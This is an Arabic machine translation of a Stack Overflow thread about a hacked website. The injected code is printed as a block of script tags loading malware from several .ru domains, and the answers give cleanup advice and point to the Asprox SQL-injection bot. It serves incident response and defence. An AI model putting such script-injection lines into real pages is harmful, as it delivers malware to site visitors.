موقعي الإلكتروني تعرض للاختراق..ماذا علي أن أفعل؟[مغلق]
https://stackoverflow.com/questions/2970
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
Russianسؤال
اتصل بي والدي اليوم وقال إن الأشخاص الذين يزورون موقعه على الإنترنت يحصلون على 168 فيروسًا يحاولون تنزيلها على أجهزة الكمبيوتر الخاصة بهم.إنه ليس تقنيًا على الإطلاق، وقام ببناء الأمر برمته باستخدام محرر WYSIWYG.
لقد فتحت موقعه واطلعت على المصدر، وكان هناك سطر من Javascript يتضمن أسفل المصدر مباشرة قبل علامة HTML للإغلاق.قاموا بتضمين هذا الملف (من بين العديد من الملفات الأخرى): http://www.98hs.ru/js.js <-- قم بإيقاف تشغيل جافا سكريبت قبل أن تذهب إلى عنوان URL هذا.
لذلك قمت بالتعليق عليه في الوقت الحالي.اتضح أن كلمة مرور FTP الخاصة به كانت عبارة عن كلمة قاموس عادية مكونة من ستة أحرف، لذلك نعتقد أن هذه هي الطريقة التي تم بها اختراقها.لقد قمنا بتغيير كلمة المرور الخاصة به إلى سلسلة مكونة من 8 أرقام أو أكثر بدون كلمات (لن يختار عبارة مرور نظرًا لأنه من النوعhunt-n-peck).
لقد فعلت ذلك ل وويس على 98hs.ru ووجدت أنه مستضاف من خادم في تشيلي.يوجد بالفعل عنوان بريد إلكتروني مرتبط به أيضًا، لكنني أشك بشدة في أن هذا الشخص هو الجاني.من المحتمل أن يكون هناك موقع آخر تم اختراقه...
ليس لدي أي فكرة عما يجب فعله في هذه المرحلة على الرغم من أنني لم أتعامل مع هذا النوع من الأشياء من قبل.هل لديكم أي اقتراحات؟
كان يستخدم بروتوكول نقل الملفات البسيط غير الآمن من خلال webhost4life.com.أنا لا أرى حتى طريقة لذلك يفعل sftp على موقعهم.أعتقد أنه تم اعتراض اسم المستخدم وكلمة المرور الخاصة به؟
لذا، لجعل هذا الأمر أكثر صلة بالمجتمع، ما هي الخطوات التي يجب عليك اتخاذها/أفضل الممارسات التي يجب عليك اتباعها لحماية موقع الويب الخاص بك من الاختراق؟
للعلم، هذا هو سطر التعليمات البرمجية الذي تمت إضافته "بطريقة سحرية" إلى ملفه (وليس موجودًا في ملفه على جهاز الكمبيوتر الخاص به - لقد تركته معلقًا فقط للتأكد تمامًا من أنه لن يفعل أي شيء) في هذه الصفحة، على الرغم من أنني متأكد من أن جيف سيحذر من هذا):
<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
المحلول
حاول وجمع أكبر قدر ممكن من المعلومات.تحقق مما إذا كان بإمكان المضيف أن يمنحك سجلاً يوضح جميع اتصالات FTP التي تم إجراؤها بحسابك.يمكنك استخدامها لمعرفة ما إذا كان قد تم استخدام اتصال FTP لإجراء التغيير وربما الحصول على عنوان IP.
إذا كنت تستخدم برنامجًا مُجهزًا مسبقًا مثل Wordpress أو Drupal أو أي شيء آخر لم تقم ببرمجته، فقد تكون هناك ثغرات أمنية في كود التحميل الذي يسمح بهذا النوع من التعديل.إذا كان مُصممًا خصيصًا، فتحقق مرة أخرى من أي أماكن تسمح فيها للمستخدمين بتحميل الملفات أو تعديل الملفات الموجودة.
الشيء الثاني هو تفريغ الموقع كما هو والتحقق من كل شيء بحثًا عن تعديلات أخرى.قد يكون هذا مجرد تعديل واحد أجروه، ولكن إذا دخلوا عبر FTP فمن يعرف ماذا يوجد هناك أيضًا.
قم بإرجاع موقعك مرة أخرى إلى حالة جيدة معروفة، وإذا لزم الأمر، قم بالترقية إلى الإصدار الأحدث.
هناك مستوى من العائد عليك أن تأخذه بعين الاعتبار أيضًا.هل يستحق الضرر محاولة تعقب الشخص أم أن هذا هو الشيء الذي تعيش فيه وتتعلم وتستخدم كلمات مرور أقوى؟
نصائح أخرى
أعلم أن هذا متأخر قليلاً في اللعبة، ولكن عنوان URL المذكور لجافا سكريبت مذكور في قائمة المواقع المعروفة بأنها كانت جزءًا من عودة ظهور روبوت ASPRox الذي بدأ في يونيو (على الأقل هذا عندما تم تمييزنا بـ هو - هي).بعض التفاصيل عنه مذكورة أدناه:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
الشيء السيئ في هذا هو أن كل حقل من نوع varchar في قاعدة البيانات "مصاب" فعليًا لإخراج مرجع إلى عنوان URL هذا، حيث يحصل المتصفح على إطار iframe صغير يحوله إلى روبوت.يمكن العثور على إصلاح SQL أساسي لهذا هنا:
http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx
لكن الشيء المخيف هو أن الفيروس يتطلع إلى جداول النظام بحثًا عن قيم لتصيبها، كما تتقاسم الكثير من خطط الاستضافة المشتركة مساحة قاعدة البيانات لعملائها.لذلك على الأرجح لم يكن حتى موقع والدك هو الذي أصيب، ولكن موقع شخص آخر ضمن مجموعة الاستضافة الخاصة به هو الذي كتب بعض التعليمات البرمجية السيئة وفتح الباب أمام هجوم حقن SQL.
إذا لم يفعل ذلك بعد، فسأرسل بريدًا إلكترونيًا عاجلاً إلى مضيفهم وأعطيهم رابطًا لرمز SQL هذا لإصلاح النظام بأكمله.يمكنك إصلاح جداول قاعدة البيانات المتأثرة الخاصة بك، ولكن على الأرجح فإن الروبوتات التي تقوم بالعدوى سوف تمر عبر تلك الثغرة مرة أخرى وتصيب المجموعة بأكملها.
نأمل أن يوفر لك هذا المزيد من المعلومات للعمل معها.
يحرر:فكرة سريعة أخرى، إذا كان يستخدم إحدى أدوات التصميم عبر الإنترنت الخاصة بالمضيف لإنشاء موقعه على الويب، فمن المحتمل أن يكون كل هذا المحتوى موجودًا في عمود وقد تم إصابته بهذه الطريقة.
لقد ذكرت أن والدك كان يستخدم أداة نشر على موقع الويب.
إذا قامت أداة النشر بالنشر من جهاز الكمبيوتر الخاص به إلى الخادم، فقد تكون ملفاته المحلية نظيفة، ويحتاج فقط إلى إعادة النشر إلى الخادم.
يجب عليه معرفة ما إذا كانت هناك طريقة تسجيل دخول إلى خادمه مختلفة عن بروتوكول FTP العادي، بالرغم من ذلك...هذا ليس آمنًا جدًا لأنه يرسل كلمة المرور الخاصة به كنص واضح عبر الإنترنت.
باستخدام كلمة مرور مكونة من ستة كلمات، ربما تم إجباره على ذلك.وهذا احتمال أكبر من اعتراض بروتوكول نقل الملفات الخاص به، ولكنه قد يكون كذلك أيضًا.
ابدأ بكلمة مرور أقوى.(8 أحرف لا تزال ضعيفة إلى حد ما)
معرفة ما إذا كان هذا الارتباط بالإنترنت مدونة الأمن مفيد.
هل الموقع مجرد HTML ثابت؟أي.لم يتمكن من ترميز صفحة تحميل تسمح لأي شخص يقود سيارته بتحميل البرامج النصية/الصفحات المخترقة؟
لماذا لا تسأل webhost4life عما إذا كانت لديهم أي سجلات FTP متاحة وتبلغهم بالمشكلة.أنت لا تعرف أبدًا، ربما يكونون متقبلين تمامًا ويكتشفون لك ما حدث بالضبط؟
أنا أعمل لدى مضيف مشترك ونرحب دائمًا بتقارير مثل هذه ويمكننا عادةً تحديد الاتجاه الدقيق للهجوم بناءً على تقديم المشورة بشأن المكان الذي ارتكب فيه العميل الخطأ.
افصل خادم الويب دون إيقاف تشغيله لتجنب البرامج النصية لإيقاف التشغيل.قم بتحليل القرص الصلب من خلال كمبيوتر آخر كمحرك بيانات ومعرفة ما إذا كان بإمكانك تحديد الجاني من خلال ملفات السجل والأشياء من هذا القبيل.تأكد من أن الرمز آمن ثم قم باستعادته من نسخة احتياطية.
لقد حدث هذا لعميل لي مؤخرًا تمت استضافته على ipower.لست متأكدًا مما إذا كانت بيئة الاستضافة الخاصة بك تعتمد على Apache، ولكن إذا كان من المؤكد التحقق مرة أخرى من ملفات .htaccess التي لم تقم بإنشائها، خاصة فوق webroot وداخل أدلة الصور، لأنها تميل إلى إدخال بعض القبح هناك أيضًا (كانوا يعيدون توجيه الأشخاص اعتمادًا على المكان الذي أتوا منه في المرجع).تحقق أيضًا من أي رمز قمت بإنشائه بحثًا عن التعليمات البرمجية التي لم تكتبها.
لقد تم اختراقنا من نفس الأشخاص على ما يبدو!أو الروبوتات، في حالتنا.لقد استخدموا حقن SQL في عنوان URL في بعض مواقع ASP الكلاسيكية القديمة التي لم يعد أحد يحتفظ بها.لقد وجدنا عناوين IP مهاجمة وقمنا بحظرها في IIS.الآن يجب علينا إعادة بناء كافة ASP القديمة.لذا، نصيحتي هي إلقاء نظرة على سجلات IIS أولاً، لمعرفة ما إذا كانت المشكلة في كود موقعك أو تكوين الخادم.
